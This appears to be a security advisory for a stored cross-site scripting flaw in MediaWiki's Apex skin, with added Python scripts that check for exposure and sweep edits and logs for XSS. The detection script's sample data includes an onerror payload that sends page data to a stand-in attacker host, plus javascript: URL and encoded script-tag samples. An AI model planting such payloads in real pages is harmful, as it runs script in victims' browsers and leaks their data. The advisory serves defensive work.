CVE-2024-47840

4.8 MEDIUM

📋 TL;DR

Stored cross-site scripting in the Apex skin for MediaWiki: an attacker who can place crafted content where the Apex skin renders it without proper escaping gets script executed in the browser of every user who later views that page with Apex. It affects MediaWiki installations that have the Apex skin installed, in the versions listed below. MediaWiki session cookies are HttpOnly by default, so the injected script cannot simply read the cookie, but it can still act as the victim (make edits or API calls with their session and CSRF token), harvest data from the page, or redirect them to a malicious site.

💻 Affected Systems

Products:
  • MediaWiki with Apex skin
Versions: MediaWiki 1.39.X before 1.39.9, 1.41.X before 1.41.3, 1.42.X before 1.42.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes, once the Apex skin is installed and loaded (wfLoadSkin( 'Apex' ) in LocalSettings.php). Apex is not bundled with the MediaWiki tarball; a stock install defaults to the Vector skin and is not affected by this issue.
Notes: Only installations that load the Apex skin are affected. Other skins are not vulnerable to this issue; the same security and maintenance release also addresses other problems, so updating is advisable regardless.

📦 What is this software?

MediaWiki is the PHP wiki engine that runs Wikipedia and many other public and internal wikis. A skin is the component that renders the page chrome (header, sidebar, tabs) around the article content. Apex is a MediaWiki skin distributed separately from core; it has to be downloaded and enabled explicitly, which is why only installations that chose it are exposed.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Script running in an administrator's browser can perform any action that administrator is allowed to perform (including granting rights, editing site-wide JavaScript, or deleting content) using the victim's session and CSRF token, deface pages, or serve malware to every visitor who uses the Apex skin.

🟠

Likely Case

Actions performed on behalf of logged-in users who view the injected page (edits, API calls), theft of page data or form contents, and redirection to phishing sites. Direct cookie theft is unlikely because MediaWiki sets its session cookies HttpOnly by default ($wgCookieHttpOnly), but a script that runs in the victim's origin does not need the cookie to act as them.

🟢

If Mitigated

A Content Security Policy that blocks inline script, editing restricted to trusted accounts, and the Apex skin disabled for users reduce the exposure, but none of these removes the bug; only the fixed version does. Stored XSS remains dangerous as long as the vulnerable skin can render attacker-controlled content.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No (as rated; on wikis that allow anonymous editing, the edit access the attack needs is available without an account)
Complexity: MEDIUM

Requires the ability to get attacker-controlled content onto a page that victims render with the Apex skin (typically some level of editing permission). The victim must be using Apex, either because it is the wiki's default skin or through their user preferences.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: MediaWiki 1.39.9, 1.41.3, or 1.42.2

Vendor Advisory: https://phabricator.wikimedia.org/T368628

Restart Required: No (PHP loads the updated files on the next request). If PHP opcache is configured with opcache.validate_timestamps disabled, restart PHP-FPM or the web server so the patched files are actually picked up.

Instructions:

1. Update MediaWiki core to 1.39.9, 1.41.3 or 1.42.2 (or later on the same release branch).
2. Update the Apex skin separately: it is not part of the core tarball, so fetch the skin's release branch matching the new core version (REL1_39, REL1_41 or REL1_42) and replace the skins/Apex directory with it.
3. Run maintenance/update.php as for any upgrade, then purge caches: the parser/object cache and any front-end cache (Varnish, CDN) that may still hold pages rendered by the vulnerable skin.

🔧 Temporary Workarounds

Disable Apex skin

Platforms: all

Move users to a skin that is not affected and make sure Apex can no longer be rendered at all.

Edit LocalSettings.php: set $wgDefaultSkin to another skin (e.g., 'vector') and remove or comment out the wfLoadSkin( 'Apex' ) line. Changing $wgDefaultSkin alone is not enough, because users who selected Apex in their preferences keep using it; adding 'apex' to $wgSkipSkins only hides it from the preferences list and the skin stays reachable through the useskin URL parameter. Only unloading the skin closes the hole.

Implement Content Security Policy

Platforms: all

Send a CSP header so that injected inline script and scripts from untrusted origins are not executed. This limits the damage but does not remove the bug, and a policy that is too strict breaks legitimate gadgets and inline scripts.

MediaWiki has built-in CSP support: set $wgCSPHeader in LocalSettings.php, and start with $wgCSPReportOnlyHeader to collect violation reports and find breakage before enforcing. The header can also be set in the web server configuration if you prefer to manage it there.

🧯 If You Can't Patch

  • Restrict editing to trusted users, and be especially careful with the editinterface right (MediaWiki: namespace) and site-wide CSS/JS rights, since content edited there is rendered on every page.
  • Add web application firewall rules for XSS payloads on edit submissions. MediaWiki accepts edits both through index.php form posts and through api.php, so cover both, and expect false positives on legitimate wikitext that discusses HTML.

🔍 How to Verify

Check if Vulnerable:

Confirm two things: that the Apex skin is loaded (wfLoadSkin( 'Apex' ) in LocalSettings.php, or Apex listed under installed skins on Special:Version or in api.php?action=query&meta=siteinfo&siprop=skins) and that the MediaWiki version is inside the affected range above.

Check Version:

Open Special:Version, which shows the MediaWiki version together with installed skins and extensions, or request api.php?action=query&meta=siteinfo&siprop=general&format=json and read the "generator" field (e.g., "MediaWiki 1.39.8"). The version is not shown in the page footer by default.

Verify Fix Applied:

Confirm that Special:Version reports 1.39.9, 1.41.3, 1.42.2 or later and that the installed Apex skin is the release branch matching that version (it is updated separately from core, so a core-only update leaves the skin vulnerable).
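The checks in the workaround and verification sections (version in the affected range, Apex still loaded, fix confirmed), as an added Python example. This is not code from the advisory or from MediaWiki; it assumes the JSON shape returned by api.php?action=query&meta=siteinfo (a "generator" string and a siprop=skins list with "code" entries) and a LocalSettings.php that loads skins with wfLoadSkin()/wfLoadSkins(). The siteinfo documents and LocalSettings fragments at the bottom are constructed; the version cut-offs are the ones listed in this advisory.

```python
"""Vulnerability check for the Apex skin stored XSS (CVE-2024-47840).

Added example, not part of the advisory or of MediaWiki. It decides, from data an
administrator already has, whether an installation is still exposed:
  * the version string from api.php siteinfo ("generator") or Special:Version,
  * the installed-skins list from siteinfo (siprop=skins), and
  * the LocalSettings.php text, to see whether Apex is still loaded.
Sample inputs at the bottom are constructed for this example.
"""
import re

# First fixed release on each affected branch, as listed in the advisory.
FIXED = {(1, 39): (1, 39, 9), (1, 41): (1, 41, 3), (1, 42): (1, 42, 2)}


def parse_version(generator: str) -> tuple[int, ...]:
    """'MediaWiki 1.39.8' -> (1, 39, 8); '1.42.0-rc.1' -> (1, 42, 0)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", generator)
    if not m:
        raise ValueError(f"no version number in {generator!r}")
    return tuple(int(x) for x in (m.group(1), m.group(2), m.group(3) or 0))


def version_status(generator: str) -> str:
    """'affected', 'fixed', or 'not listed' for branches the advisory does not cover."""
    v = parse_version(generator)
    fixed = FIXED.get(v[:2])
    if fixed is None:
        return "not listed"  # e.g. an end-of-life 1.40.x: treat as unsupported, not safe
    return "affected" if v < fixed else "fixed"


def apex_loaded(localsettings: str) -> bool:
    """True if LocalSettings.php still loads the Apex skin.

    Handles wfLoadSkin( 'Apex' ) and wfLoadSkins( [ ..., 'Apex' ] ) with either quote
    style; lines commented out with // or # are ignored (block comments are not
    handled). $wgSkipSkins is deliberately NOT treated as disabling: it only hides
    the skin from preferences, and ?useskin=apex still renders with it.
    """
    for line in localsettings.splitlines():
        code = line.split("//", 1)[0].split("#", 1)[0]
        if re.search(r"wfLoadSkins?\s*\([^)]*['\"]Apex['\"]", code):
            return True
    return False


def assess(siteinfo: dict, localsettings: str) -> dict:
    """Combine the API answer and the config file into one verdict."""
    query = siteinfo["query"]
    skins = {s["code"] for s in query.get("skins", [])}
    status = version_status(query["general"]["generator"])
    apex = "apex" in skins or apex_loaded(localsettings)
    return {
        "version": query["general"]["generator"],
        "version_status": status,
        "apex_enabled": apex,
        "vulnerable": apex and status == "affected",
    }


# Constructed sample data: shape follows the siteinfo API, values are made up.
SITEINFO_OLD = {"query": {"general": {"generator": "MediaWiki 1.39.8"},
                          "skins": [{"code": "vector", "name": "Vector", "default": ""},
                                    {"code": "apex", "name": "Apex"}]}}
SITEINFO_NEW = {"query": {"general": {"generator": "MediaWiki 1.39.9"},
                          "skins": [{"code": "vector", "name": "Vector", "default": ""}]}}

# Weak workaround: default skin changed and Apex hidden, but still loaded.
LOCALSETTINGS_WEAK = """
wfLoadSkin( 'Vector' );
wfLoadSkin( 'Apex' );
$wgDefaultSkin = 'vector';
$wgSkipSkins = [ 'apex' ];
"""
# Effective workaround: the skin is no longer loaded at all.
LOCALSETTINGS_FIXED = """
wfLoadSkin( 'Vector' );
// wfLoadSkin( 'Apex' );   disabled pending upgrade, CVE-2024-47840
$wgDefaultSkin = 'vector';
"""

if __name__ == "__main__":
    print(assess(SITEINFO_OLD, LOCALSETTINGS_WEAK))   # vulnerable: True
    print(assess(SITEINFO_NEW, LOCALSETTINGS_FIXED))  # vulnerable: False
```

To run it against a live wiki, fetch api.php?action=query&meta=siteinfo&siprop=general|skins&format=json and pass the parsed JSON to assess() together with the contents of LocalSettings.php; the "not listed" status is a prompt to read the advisory, not a clean bill of health.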

📡 Detection & Monitoring

Log Indicators:

  • Edits (revision text or edit summaries) containing script tags, on* event-handler attributes, javascript: URLs, or their URL-encoded or HTML-entity-encoded forms. MediaWiki's parser escapes a raw <script> tag in ordinary wikitext, so a search for the literal tag alone misses most payloads that actually reach a rendered page.
  • Edits to the MediaWiki: namespace (interface messages, sidebar) or to site-wide CSS/JS by accounts that do not normally touch them.
  • Bursts of rejected or reverted markup-heavy edits from one account or IP, visible in recent changes and in web server access logs.

Network Indicators:

  • Browsers of users who viewed a particular page making requests to unfamiliar external hosts, seen in proxy logs or in CSP violation reports if a report-only policy is in place.

SIEM Query:

Search page content, edit summaries and web server access logs for the patterns *<script*, *javascript:*, *onerror=* and *onload=*, matching both the raw and the URL-decoded form (e.g., %3Cscript). Treat hits in MediaWiki: namespace edits as highest priority.
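The detection sweep described above, as an added Python example (not code from the advisory or from MediaWiki). It goes beyond the single *<script* pattern by decoding URL and HTML-entity encodings first and by checking event handlers and javascript: URLs, and it runs over two constructed inputs: revision records in the shape returned by api.php prop=revisions (title, user, content) and web server access-log lines in combined log format. All sample records below are constructed for this example.

```python
"""Detection sweep for stored-XSS payloads in MediaWiki content and access logs.

Added example, not from the advisory. MediaWiki escapes a raw <script> in wikitext,
so payloads that survive to a rendered page more often use event-handler attributes,
javascript: URLs, or interface pages (MediaWiki: namespace). The patterns here are a
triage filter, not an HTML parser: expect some false positives and review hits.
"""
import re
from urllib.parse import unquote

PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_url": re.compile(r"javascript\s*:", re.I),
    "data_html_url": re.compile(r"data:text/html", re.I),
    "active_element": re.compile(r"<\s*(svg|iframe|object|embed)\b", re.I),
}
SENSITIVE_PREFIXES = ("MediaWiki:",)  # interface messages; needs the editinterface right

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(text: str) -> str:
    """Undo the encodings an attacker can use to dodge a literal string match."""
    t = unquote(unquote(text))  # twice: catches double-encoded %253C -> %3C -> <
    t = re.sub(r"&#x([0-9a-f]{1,6});?",
               lambda m: chr(min(int(m.group(1), 16), 0x10FFFF)), t, flags=re.I)
    t = re.sub(r"&#(\d{1,7});?",
               lambda m: chr(min(int(m.group(1)), 0x10FFFF)), t)
    return t.replace("&lt;", "<").replace("&gt;", ">")


def scan(text: str) -> list[str]:
    """Names of the patterns that match the decoded text, in PATTERNS order."""
    t = normalize(text)
    return [name for name, rx in PATTERNS.items() if rx.search(t)]


def sweep_revisions(revisions) -> list[dict]:
    """revisions: iterable of dicts with title, user, content (API prop=revisions shape)."""
    hits = []
    for rev in revisions:
        found = scan(rev["content"])
        if rev["title"].startswith(SENSITIVE_PREFIXES):
            found.append("interface_namespace")  # flag every interface edit for review
        if found:
            hits.append({"title": rev["title"], "user": rev["user"], "indicators": found})
    return hits


def sweep_access_log(lines) -> list[dict]:
    """Scan the request target of each access-log line (query strings are URL-encoded)."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        found = scan(m["target"])
        if found:
            hits.append({"ip": m["ip"], "target": m["target"], "indicators": found})
    return hits


# Constructed sample data (titles, users, IPs and payloads are made up).
REVISIONS = [
    {"title": "Main Page", "user": "Alice",
     "content": "Welcome to the wiki. Use C++ and a+b."},
    {"title": "Help:Editing", "user": "Mallory",
     "content": "<img src=x onerror=\"fetch('//evil.example/?c='+document.title)\">"},
    {"title": "MediaWiki:Sidebar", "user": "Mallory",
     "content": "* navigation\n** javascript&#58;alert(1)|Help"},
]
ACCESS_LOG = [
    '203.0.113.5 - - [10/Oct/2024:12:00:01 +0000] "GET /index.php?title=Main_Page HTTP/1.1" 200 4521',
    '203.0.113.9 - - [10/Oct/2024:12:00:07 +0000] "GET /index.php?title=Sandbox&action=edit'
    '&summary=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3310',
]

if __name__ == "__main__":
    for hit in sweep_revisions(REVISIONS) + sweep_access_log(ACCESS_LOG):
        print(hit)
```

Feed sweep_revisions() with the output of api.php?action=query&list=recentchanges followed by prop=revisions&rvprop=content for the changed pages, and sweep_access_log() with the raw access log; POST bodies are not in access logs, so the revision sweep is the one that sees edits submitted through forms or api.php.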
